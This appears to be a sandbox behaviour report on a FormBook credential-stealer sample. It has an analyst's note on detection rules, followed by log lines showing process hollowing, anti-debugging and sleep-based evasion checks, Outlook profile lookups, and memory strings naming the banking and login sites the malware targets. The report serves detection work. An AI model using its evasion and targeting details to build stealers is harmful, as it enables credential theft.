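Rule 1 fires on the hollowed svchost.exe because the sandbox records the child's command line as the parent's path; on a real host the same mismatch is visible in Sysmon event 1 (Image versus CommandLine). Rule 3 is what makes the comp.exe -> firefox.exe hop stand out: comp.exe is a file-comparison utility with no reason to start a browser, and FormBook runs its browser-credential stage inside a freshly started browser process. The comp.exe row itself is not flagged by these rules; its parent in an odd Program Files (x86) directory is only suspicious in the context of the rest of the tree.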
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\comp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: QUOTATON-37839993.exe | Static file information: File size 1226240 > 1048576
                Source: QUOTATON-37839993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: QUOTATON-37839993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: QUOTATON-37839993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: QUOTATON-37839993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: QUOTATON-37839993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: QUOTATON-37839993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: QUOTATON-37839993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: comp.pdb source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FOBNeEFwBsF.exe, 0000000C.00000000.2513093798.000000000023E000.00000002.00000001.01000000.00000005.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4007354281.000000000023E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
                Source: QUOTATON-37839993.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: QUOTATON-37839993.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: QUOTATON-37839993.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: QUOTATON-37839993.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: QUOTATON-37839993.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E04B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E28945 push ecx; ret 0_2_00E28958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02658B23 pushad ; ret 4_2_02658CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0265222A push cs; retf 4_2_0265222F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_026522B0 push ecx; retf 4_2_026522BD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_026522BF pushfd ; iretd 4_2_026522C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02643350 push eax; ret 4_2_02643352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0265183B push edi; iretd 4_2_0265183C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_026580FB pushfd ; retf 4_2_02658116
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02653E7E push ss; retf 4_2_02653E81
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02648600 push ebp; iretd 4_2_02648601
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02658F7A push ecx; iretd 4_2_02658F81
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0264175C pushfd ; ret 4_2_02641778
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02664FC3 push edi; iretd 4_2_02664FCE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02658C08 pushad ; ret 4_2_02658CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02648562 push edi; iretd 4_2_02648563
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02648572 push esi; ret 4_2_02648573
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02641552 pushfd ; ret 4_2_02641566
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02654503 push FFFFFFB7h; iretd 4_2_02654516
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_026565F1 push eax; iretd 4_2_02656603
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_026415BB pushfd ; ret 4_2_02641566
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030309AD push ecx; mov dword ptr [esp], ecx 4_2_030309B6
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Code function: 12_2_0305D3F1 push edi; iretd 12_2_0305D3F2
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Code function: 12_2_0306713F push ecx; retf 12_2_0306714C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Code function: 12_2_0306714E pushfd ; iretd 12_2_0306714F
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Code function: 12_2_030670B9 push cs; retf 12_2_030670BE
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306CF8A pushfd ; retf 12_2_0306CFA5
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306DE09 push ecx; iretd 12_2_0306DE10
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03079E52 push edi; iretd 12_2_03079E5D
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_030666CA push edi; iretd 12_2_030666CB
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0305D401 push esi; ret 12_2_0305D402
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306A484 push FF5A8F7Dh; ret 12_2_0306A491
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E048D7
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E85376
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E23187
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeAPI/Special instruction interceptor: Address: 1050AAC
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E rdtsc 4_2_0307096E
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\comp.exeAPI coverage: 2.8 %
                Source: C:\Windows\SysWOW64\comp.exe TID: 8004 Thread sleep count: 40 > 30
                Source: C:\Windows\SysWOW64\comp.exe TID: 8004 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe TID: 8032 Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe TID: 8032 Thread sleep time: -33000s >= -30000s
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E6445A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6C6D1 FindFirstFileW,FindClose,0_2_00E6C6D1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E6C75C
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6EF95
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F0F2
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6F3F3
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E637EF
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63B12
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6BCBC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E7C420 FindFirstFileW,FindNextFileW,FindClose,13_2_02E7C420
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E049A0
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 2-64-111.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 2-64-111.13.drBinary or memory string: discord.comVMware20,11696487552f
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PasswordVMware20
                Source: 2-64-111.13.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: FOBNeEFwBsF.exe, 0000000E.00000002.4008571068.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169648
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,
                Source: 2-64-111.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 2-64-111.13.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,1
                Source: 2-64-111.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,116c
                Source: 2-64-111.13.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2884284799.0000020B7352C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2-64-111.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 2-64-111.13.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (rokers.comVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /profileVMware20
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 2-64-111.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696
                Source: 2-64-111.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20
                Source: 2-64-111.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 2-64-111.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 2-64-111.13.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers.comVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 2-64-111.13.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 2-64-111.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 2-64-111.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 2-64-111.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\comp.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E rdtsc 4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02657743 LdrLoadDll,4_2_02657743
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E73F09 BlockInput,0_2_00E73F09
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E03B3A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00E35A7C
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E04B37 LoadLibraryA,GetProcAddress,0_2_00E04B37
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_0104F708 mov eax, dword ptr fs:[00000030h]0_2_0104F708
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_01050D18 mov eax, dword ptr fs:[00000030h]0_2_01050D18
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_01050D78 mov eax, dword ptr fs:[00000030h]0_2_01050D78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A30B mov eax, dword ptr fs:[00000030h]4_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A30B mov eax, dword ptr fs:[00000030h]4_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A30B mov eax, dword ptr fs:[00000030h]4_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302C310 mov ecx, dword ptr fs:[00000030h]4_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03050310 mov ecx, dword ptr fs:[00000030h]4_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
